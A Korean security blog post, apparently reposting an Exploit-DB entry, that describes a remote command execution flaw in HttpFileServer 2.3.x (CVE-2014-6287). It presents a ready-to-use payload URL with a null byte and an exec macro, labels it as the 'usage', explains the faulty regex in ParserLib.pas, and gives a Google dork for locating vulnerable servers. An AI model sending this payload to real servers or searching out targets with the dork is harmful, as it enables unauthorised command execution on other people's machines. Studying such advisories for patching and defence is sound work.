출처 : http://www.exploit-db.com
HttpFileServer 2.3.x 버전에서
Remote Command Execution 취약점이 확인이 되었습니다.
사용법은
http://localhost:80/search=%00{.exec|cmd.}
입니다
즉 hfs 시스템에서 파일을 검색하는 과정에서 파싱의 문자열 오류로 명령어가 입력이 되는 취약점 입니다.
아래는 전문입니다.
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.
'보안 > 웹' 카테고리의 다른 글
WordPress DDOS 공격 분석 (0) | 2014.09.30 |
---|---|
Bash Vulnerability CVE-2014-6271 Test Tool (0) | 2014.09.26 |
Bash Environment Variables Code Injection Exploit (CVE-2014-6271) (0) | 2014.09.26 |
Internet Explorer MS14-029 취약점 코드 (0) | 2014.09.21 |
PhpWiki - Remote Command Execution (0) | 2014.09.09 |